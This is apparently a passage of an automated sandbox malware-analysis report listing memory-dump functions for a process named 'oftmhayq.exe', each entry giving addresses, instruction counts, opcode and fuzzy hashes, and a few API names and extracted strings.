                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83a49f0f5ca19e210a502d2c5144ba72fc773d4af16034540d62b2db17406b13
                                                • Instruction ID: 132cf31a707d094ca887c4475f9c8785e66c9a7c98ebea7dc518b948c60ef337
                                                • Opcode Fuzzy Hash: 83a49f0f5ca19e210a502d2c5144ba72fc773d4af16034540d62b2db17406b13
                                                • Instruction Fuzzy Hash: F6F027B17192415FCF120724982A399BFA5EBC2335F1841A7E156C72D1DB34980BCB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F81B0, Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ecdee5ddc058340442b92bbfdbd3377df9d6c4a5213b3feb34945ea4bb965163
                                                • Instruction ID: 8b4db3299e4d2f0f1a68ba4d9da6383864a4eb8336715097a525a22d1eb58cf5
                                                • Opcode Fuzzy Hash: ecdee5ddc058340442b92bbfdbd3377df9d6c4a5213b3feb34945ea4bb965163
                                                • Instruction Fuzzy Hash: 33E026723104120BD719055EA8855BBEB5DEBC8338B14827FF509C7740CE3588038240
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F81C0, Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7530d87f02f54ed37325fc7f6f4045a0b23d7245acfdd245e0eae3c18d515b8
                                                • Instruction ID: dc7a44fb6066217f5061b7348b92bbebb676e7ca8d5ec3aa8c6dd0f0c323d212
                                                • Opcode Fuzzy Hash: f7530d87f02f54ed37325fc7f6f4045a0b23d7245acfdd245e0eae3c18d515b8
                                                • Instruction Fuzzy Hash: C4D05E72325612171715155F689843BFB9EE7CD635314813BFA0AC3340DEA08C028290
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FE740, Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1b12d66b70fa6b7fcbf24d29127d300af288f05c5c9175cc1bffa433ccfeffe
                                                • Instruction ID: 0bd488df3235d0ed4615365cee9f0988908098d0b561395049bfa1d281693bc2
                                                • Opcode Fuzzy Hash: f1b12d66b70fa6b7fcbf24d29127d300af288f05c5c9175cc1bffa433ccfeffe
                                                • Instruction Fuzzy Hash: 56E0C2733002289F8204B364C85099973ABEF8D22438102EAD64C9B3A1DF60BC0647EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F4D6D, Relevance: .0, Instructions: 19COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c805405a1abe5289e9ac94db7b82fc1890a6833f72f7e1264b2909c53197d34f
                                                • Instruction ID: daad38b8688c45194eb035d428975d0d6976ad925dd9ae5e8a9e919bb1313eae
                                                • Opcode Fuzzy Hash: c805405a1abe5289e9ac94db7b82fc1890a6833f72f7e1264b2909c53197d34f
                                                • Instruction Fuzzy Hash: 26D02BF36582904FE3068204E4637BB7B608BA3204F47809BD1418B2D6E614C446CB71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F7318, Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dabb022ba7fe9ecaf6ba25e81c0e231ea141e19333b881d18774dad2f8090e21
                                                • Instruction ID: 11697611a1d7ce05005855cf99b951c4f81d60600650d2e8802c57596a084e69
                                                • Opcode Fuzzy Hash: dabb022ba7fe9ecaf6ba25e81c0e231ea141e19333b881d18774dad2f8090e21
                                                • Instruction Fuzzy Hash: 22D0A77250E3E47FC3039765D841684BF6D8D435243AD80D7D508C7147D916E84183E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FFE82, Relevance: .0, Instructions: 15COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9af0771d14da8905c115393534969981bb762376cc40125ce1d75bf6b85fe43
                                                • Instruction ID: d6af6bcf269d3c5cd0f67a0269295c02c5a13feccb5b471173f369876551e2bb
                                                • Opcode Fuzzy Hash: f9af0771d14da8905c115393534969981bb762376cc40125ce1d75bf6b85fe43
                                                • Instruction Fuzzy Hash: A3D05EBA6042109BE244CE44D8009E2F7A5FFD8320F16885AE800432508B71EC17CAA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F74C4, Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05a2ecfad25ab197cf7f2eeaafbb8ed3948ad301524b2ed9161ce46cd0c67a91
                                                • Instruction ID: 1ae8547dc721b4421d3df86cdc3aa1c5c33f8a2000c696a9f5ee0a08da8bed7e
                                                • Opcode Fuzzy Hash: 05a2ecfad25ab197cf7f2eeaafbb8ed3948ad301524b2ed9161ce46cd0c67a91
                                                • Instruction Fuzzy Hash: 85D0C939B40008CF8B44DBADE4544ECBBB1EFC9216B8000AAE20ADB260DB3198158B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F772C, Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 81c4a307b82be23a16df68eaa8e338fe490f64da7e37bbec380398ad1b1051d7
                                                • Instruction ID: bd853573a430cfce9ebf51cd9910ec1946f483f7b17b7ca434c5d80e8fb56694
                                                • Opcode Fuzzy Hash: 81c4a307b82be23a16df68eaa8e338fe490f64da7e37bbec380398ad1b1051d7
                                                • Instruction Fuzzy Hash: 54D01236740004CF8708DB5DD4548E873B1EFC9619B8100E6E306C7670CB31DC55C781
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F768A, Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34b7cc3066dec69f9153d4421561895b703c8f728ee93b75d80258d40d00c6e9
                                                • Instruction ID: b0f1ace52b53238ee83451c4178ab7c1f4a2ba7e763b339601b51385a391e9e8
                                                • Opcode Fuzzy Hash: 34b7cc3066dec69f9153d4421561895b703c8f728ee93b75d80258d40d00c6e9
                                                • Instruction Fuzzy Hash: 5DD01235710005CF8748DB5AD4548E873B5EFC9615B9100E6E306D72A1DB32DD148791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FE556, Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b43db9675d2c076784d4444c0ea7dad61abf336d198399f268f46d559f5fb6aa
                                                • Instruction ID: ad5f7c7d7045a4498aefbf6e92dd89ab342d0d4e3f9c12bb26cd7481a471b5af
                                                • Opcode Fuzzy Hash: b43db9675d2c076784d4444c0ea7dad61abf336d198399f268f46d559f5fb6aa
                                                • Instruction Fuzzy Hash: 5EC02BFBF5800CC7CB044B807C1E3E03730EB1122BF010185EC0D040007F36094C8A50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FFFA0, Relevance: .0, Instructions: 8COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c26551bbf609495498fe413ed604a70133aa604acaed15ec6d3c5f40e5b5b955
                                                • Instruction ID: 808af7bdc498f2994ad47dc209e78dbe64c61e8204e46a74889016d422c315b9
                                                • Opcode Fuzzy Hash: c26551bbf609495498fe413ed604a70133aa604acaed15ec6d3c5f40e5b5b955
                                                • Instruction Fuzzy Hash: CBC02BF260C5004BFF114300BC427807E30AB90309F07C013C201D638FD7744026DE25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F6F19, Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43ef7347b2b1b5a7905b9b0c760ed1375f42e9a0089b54a98d7972befee861e5
                                                • Instruction ID: adef69794c6d8d1664415254b9241a3877b9af2ddef9b2564f29573092da8ee3
                                                • Opcode Fuzzy Hash: 43ef7347b2b1b5a7905b9b0c760ed1375f42e9a0089b54a98d7972befee861e5
                                                • Instruction Fuzzy Hash: 35B092B22200009B8618CB05C94B95BBB62EBE0300786C129A00582224EA34A802C774
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FF7B0, Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                                                • Instruction ID: e80b9cbb32ce7aa80f269217a2acaa4f8c5de131eb2df65f765f3a476441bad2
                                                • Opcode Fuzzy Hash: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                                                • Instruction Fuzzy Hash: 3DB002747054005B8748D65DD951515A7D29BC9215728C4AD641DC7355DE22DD039644
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F8198, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f6e5664837393243ed87b6298c34e5cc844b76ba27ce055140ada4379a56a2e
                                                • Instruction ID: ebc70d8447ab86f728f4e904adc761c34f361c1d20ab3cb5ddd4496a7ed0fce0
                                                • Opcode Fuzzy Hash: 5f6e5664837393243ed87b6298c34e5cc844b76ba27ce055140ada4379a56a2e
                                                • Instruction Fuzzy Hash: BAC092B0602340CFCB06CF20C159854BB72AF8230535940D9E00A8F622CB32DC82CB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FE56A, Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8993a61c574fa449186d953894272722aba31d71a80848339dee65110246974
                                                • Instruction ID: a65861ad50495647255699695b2efd4fec144d880a3568bc2bd920167adf98be
                                                • Opcode Fuzzy Hash: e8993a61c574fa449186d953894272722aba31d71a80848339dee65110246974
                                                • Instruction Fuzzy Hash: 26A0027556E04CC749E8CB50752A5787B34E243126B4106D5FD0E466A4BF235835CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 05BBC9A0, Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: %
                                                • API String ID: 0-2567322570
                                                • Opcode ID: bf752e0092f8eb2bdab58746dffe44e01760050662a2a489cfdbd34180d0ff0e
                                                • Instruction ID: 69f7f975f0618021a44ceadf3c8ef968ed5f905c23fefcbfc2677aa0bb653ed3
                                                • Opcode Fuzzy Hash: bf752e0092f8eb2bdab58746dffe44e01760050662a2a489cfdbd34180d0ff0e
                                                • Instruction Fuzzy Hash: C4025F74A00209CFDB14DFB5C494AAEBBB6FF88304F1084ADD505AB395DBB1AD46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05BB9F90, Relevance: 1.3, Instructions: 1267COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f078a87a349bf0b08189e5ac1be30cc7813bbb993c9acfc7358c065fa663507
                                                • Instruction ID: e93ff1335ddaa7d732c6e95d2949d550169528f27abd92a83b554fefd6566d28
                                                • Opcode Fuzzy Hash: 5f078a87a349bf0b08189e5ac1be30cc7813bbb993c9acfc7358c065fa663507
                                                • Instruction Fuzzy Hash: 9CC20B34A00218CFDB25DF65C894AEDBBB2FF49305F1485E9E54AAB250DBB1AD81CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05BB1AA9, Relevance: .8, Instructions: 783COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2893f45f4cf3174ce042946e6c6faa45a5d6f9accbffb45772f1071cb5059ce1
                                                • Instruction ID: 5ece6dbbd66f1ecc11600f6b994afad46e476da73ef939bbbc8fb13d0b5184e7
                                                • Opcode Fuzzy Hash: 2893f45f4cf3174ce042946e6c6faa45a5d6f9accbffb45772f1071cb5059ce1
                                                • Instruction Fuzzy Hash: 01626FB12102049BD748DF28D45876A7AE6EF8830CF64C59CD1099F392DFBAD94B8BD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05BB1AB8, Relevance: .8, Instructions: 780COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69c5a41f87157efa0962d1ccae72546b76ea2ee8fb8d20baae3801c2a72209a9
                                                • Instruction ID: f1b7915dcab286e08fbe857d0b0cfec2d1a6b7a391c4fe9e9f346db41519a364
                                                • Opcode Fuzzy Hash: 69c5a41f87157efa0962d1ccae72546b76ea2ee8fb8d20baae3801c2a72209a9
                                                • Instruction Fuzzy Hash: 066260B12102049BD748DF28D45876A7AE6EB8830CF64C59CD1099F392DFBAD94B8FD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F3630, Relevance: .5, Instructions: 475COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8213b4109f0d244250404f87ca1e91306e33b18729f1a7eb1c3871be1d923680
                                                • Instruction ID: d2e39f729bb27fe50c6c021e312b8990d6f51711cefd7609fd494f4d510f0980
                                                • Opcode Fuzzy Hash: 8213b4109f0d244250404f87ca1e91306e33b18729f1a7eb1c3871be1d923680
                                                • Instruction Fuzzy Hash: E02248B4A01219CFCB19CF65C494BADBBB2FF49304F1480A9E90AAB291DB30DD85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A9E578, Relevance: .3, Instructions: 315COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e141afd1c33711063413f382d7d303d0b50a6d3231956e7a2395127b25340d29
                                                • Instruction ID: c26dc57c61762c930a71a02ec7d9405727731a64e2d1aff732f2a8b5316f78a5
                                                • Opcode Fuzzy Hash: e141afd1c33711063413f382d7d303d0b50a6d3231956e7a2395127b25340d29
                                                • Instruction Fuzzy Hash: AC12B7F1C917468AD312DF65E89C1897BA0B746328FD04A0CD2617BAF2DBB4916BCF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A9C134, Relevance: .3, Instructions: 265COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 086efef7e1fc478c31f2fb41de7ca930fc890a282d1a755bae9f19c1c378b180
                                                • Instruction ID: 258ad45335a332a7816d3c096c607df6e73a0525c4dae1d3d2ac4b30fde5d53b
                                                • Opcode Fuzzy Hash: 086efef7e1fc478c31f2fb41de7ca930fc890a282d1a755bae9f19c1c378b180
                                                • Instruction Fuzzy Hash: A8A14B32E006198FCF05EFA6C98459EB7F3FF89304B15856AE905AB261EF31A955CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07302F05, Relevance: .3, Instructions: 257COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 654a95c941f7063a55d2a23a7082326d2da4f952626aeaa7eeeb8b935a8b42ff
                                                • Instruction ID: a81bedeca676899d3268f5da0b7774f97c99aa7e1ac8dcdff683dea4ef72f3c4
                                                • Opcode Fuzzy Hash: 654a95c941f7063a55d2a23a7082326d2da4f952626aeaa7eeeb8b935a8b42ff
                                                • Instruction Fuzzy Hash: 8E715B2B11A2D39EE3434B78E8121DABF309E4B27172E00DBD8C05F863C725556AD7D2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0730B9A0, Relevance: .2, Instructions: 238COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5605b98c44e116309039eac9dd6a0755cad37753f0ce96edbf1653b6d141115b
                                                • Instruction ID: c3607b3f3297415ab30ddfebe289835111545c3ba4050252f06baf7f6ce5784d
                                                • Opcode Fuzzy Hash: 5605b98c44e116309039eac9dd6a0755cad37753f0ce96edbf1653b6d141115b
                                                • Instruction Fuzzy Hash: 57916DF0E00209DFEB14CFA9C8947DEFBF6AF88314F148129E419A7294DB749845CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A9E568, Relevance: .2, Instructions: 226COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f8c8c5f9a1330a71b417f1ba45da15204ede2b51c9915c2ea1f06c5772b0c0d
                                                • Instruction ID: 87fae8223867ab5e4a00e40052ca2fc46af89b043fb73cf3ff083447d3e3b944
                                                • Opcode Fuzzy Hash: 1f8c8c5f9a1330a71b417f1ba45da15204ede2b51c9915c2ea1f06c5772b0c0d
                                                • Instruction Fuzzy Hash: D0C138F1C917458AD712DF65E88C1897BA1BB46328F904A0CD2617B6F2DBB4906BCF84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07300128, Relevance: .2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37ba8d135d137f1ee8e68adb2cb7d4d6533cd610fce9d5d7c7c1f30007c8cf24
                                                • Instruction ID: 8e02b076b745681a39d7587f4f33bb536b7baca5874b20738023be44b192689a
                                                • Opcode Fuzzy Hash: 37ba8d135d137f1ee8e68adb2cb7d4d6533cd610fce9d5d7c7c1f30007c8cf24
                                                • Instruction Fuzzy Hash: 265142A611E2D78AE3534B38E4651DBBF31AE4B13072A01CBC4C44F893C714466AD7E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07300145, Relevance: .2, Instructions: 172COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25f996343e1175f9e25b6f2d51d9efc46ed8e7c7761290c321dd0efc17b7539e
                                                • Instruction ID: 502751e451f9f817001f2d9dd9824aebe87a6a0724839da9bba35b5ef2802792
                                                • Opcode Fuzzy Hash: 25f996343e1175f9e25b6f2d51d9efc46ed8e7c7761290c321dd0efc17b7539e
                                                • Instruction Fuzzy Hash: 775134A611E2D79AE3934B38E4651DBBF31AE4B13072A01DBC4C44E893C719456AD7E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07302A55, Relevance: .2, Instructions: 166COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53ddf3d63ce92ae48643df05bcd3fbf066378d392eac3ea48abe7749ecd9ae39
                                                • Instruction ID: a78ace351dfbe4fac1a9fcde9f26cf817517db1fc708b457b0e78b98e1be9206
                                                • Opcode Fuzzy Hash: 53ddf3d63ce92ae48643df05bcd3fbf066378d392eac3ea48abe7749ecd9ae39
                                                • Instruction Fuzzy Hash: D8512FAA12E2D79AE3934B38E4654DBBF31AD4B13032E01DBC8C44F893C315456AD7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F5D28, Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (Uf$(Uf$t%Qf$t%Qf
                                                • API String ID: 0-2797057296
                                                • Opcode ID: 393ceea5c03500e8366f4a0e3310b258c257113d1780f77693fd222dd2523e1a
                                                • Instruction ID: f2fabbc9060c4357a19b2728672a20dcba6034a8049c8ad135e960353da62894
                                                • Opcode Fuzzy Hash: 393ceea5c03500e8366f4a0e3310b258c257113d1780f77693fd222dd2523e1a
                                                • Instruction Fuzzy Hash: F9A14DB4A00204CFD715DF28C488B69B7F6EF88714F1684A9D54A9B3A2DB31ED81CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: oftmhayq.exe PID: 4000 Parent PID: 5184 oftmhayq.exeCOMMON

                                                Executed Functions

                                                Function 07AD5D38, Relevance: 20.0, Strings: 15, Instructions: 1238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (Uf$(Uf$(Uf$4/Xf$4/Xf$D!Qf$D!Qf$D!Qf$D!Qf$\Pf$\Pf$\Pf$t%Qf$t%Qf$#"
                                                • API String ID: 0-168133937
                                                • Opcode ID: 430c4faa23ca5b1b660633ec55d559cf2ae266378f2a8b6121508e6d830fef93
                                                • Instruction ID: 62aaee00412773919212f8697d5f530eee553b00120c2cd329800e5033f49843
                                                • Opcode Fuzzy Hash: 430c4faa23ca5b1b660633ec55d559cf2ae266378f2a8b6121508e6d830fef93
                                                • Instruction Fuzzy Hash: 43B237B4B006158FDB24DF28C998A69B7F2EF89304F1584A9E55ADB361DB30EC81CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD21B0, Relevance: .5, Instructions: 456COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5122e283d121945eea3f1ea71d1556ad97611a6c46f7bbc85e7c6dc2d46e273
                                                • Instruction ID: cd5888dc59a380e2c73eed3d59bef9fbbb2060350bf70c3bc3d4ec7e4df55bfa
                                                • Opcode Fuzzy Hash: e5122e283d121945eea3f1ea71d1556ad97611a6c46f7bbc85e7c6dc2d46e273
                                                • Instruction Fuzzy Hash: 96126AB4A002469FC705DF68C588EAABBF2FF89304B19C499D5599B762C734EC41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD0040, Relevance: .4, Instructions: 403COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ad92c366bda31f621adeabf4a71523dc772f48e4d6c9c689a348e5f085d0e60
                                                • Instruction ID: 674d58dc5329a998dc991eb60d642f6bc1522130c80224a11e83fd1667a37a89
                                                • Opcode Fuzzy Hash: 0ad92c366bda31f621adeabf4a71523dc772f48e4d6c9c689a348e5f085d0e60
                                                • Instruction Fuzzy Hash: 13024AB5A00705CFDB25CF69C584AAABBF2FF89300F148969E46A9B751D734EC46CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0188B681, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0188B6F0
                                                • GetCurrentThread.KERNEL32 ref: 0188B72D
                                                • GetCurrentProcess.KERNEL32 ref: 0188B76A
                                                • GetCurrentThreadId.KERNEL32 ref: 0188B7C3
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 4ed1f86f348df5d56a87bf624aad0dbac7bed575fb6cc889e512549607321beb
                                                • Instruction ID: 0a4dfed1c503a52e9548576df0d8334b99cd66331c1a0e5d0ef16b9112646fee
                                                • Opcode Fuzzy Hash: 4ed1f86f348df5d56a87bf624aad0dbac7bed575fb6cc889e512549607321beb
                                                • Instruction Fuzzy Hash: 9F5177B49003498FDB54DFA9C9887DEBFF0BF88318F248459E519A7290C7346988CF69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0188B690, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0188B6F0
                                                • GetCurrentThread.KERNEL32 ref: 0188B72D
                                                • GetCurrentProcess.KERNEL32 ref: 0188B76A
                                                • GetCurrentThreadId.KERNEL32 ref: 0188B7C3
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: e15d4fed834102ff17f5d398afcedd0ee8f4fc366dbf665fafaba9776f0d6061
                                                • Instruction ID: 244bb7d35e8ab1ae25b3356f5a92cc149ce3748866dd35ddb7ed78bb3fa1caec
                                                • Opcode Fuzzy Hash: e15d4fed834102ff17f5d398afcedd0ee8f4fc366dbf665fafaba9776f0d6061
                                                • Instruction Fuzzy Hash: 925157B49003498FDB54DFA9C988BDEBBF0BF88314F248459E919A7350C7746984CF65
                                                Uniqueness

